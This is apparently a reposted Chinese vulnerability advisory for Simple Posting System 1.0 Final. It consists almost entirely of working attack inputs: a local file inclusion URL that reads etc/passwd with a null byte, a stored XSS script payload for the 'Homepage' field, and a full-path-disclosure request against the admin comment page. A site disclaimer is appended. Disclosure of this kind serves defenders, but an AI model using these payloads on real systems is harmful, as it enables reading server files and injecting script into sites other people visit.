标题: Simple Posting System [Multple] 作者: n0tch aka andmuchmore 下载 地址: http://realize.be/files/sps.tar.gz 影响版本: 1.0 Final 测试平台: Windows 7 / Linux (Ubuntu) +[-- 本地文件包含缺陷 --]+ http:// HdhCmsTest2cto测试数据 /sps.php?old=etc/passwd%00 +[-- 持久型 XSS --]+ 缺点位于 = "Homepage" Payload syntax: ><script>alert('XSS');</script> +[-- FPD --]+ http://localhost/sps/sps_admin/comment.php?op=del&id=3&aantal=4 +[-- Shoutz --]+ All the belegit crew..
查看更多关于Simple Posting System本地文件包含等缺陷及修复 - 网的详细内容...
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did12335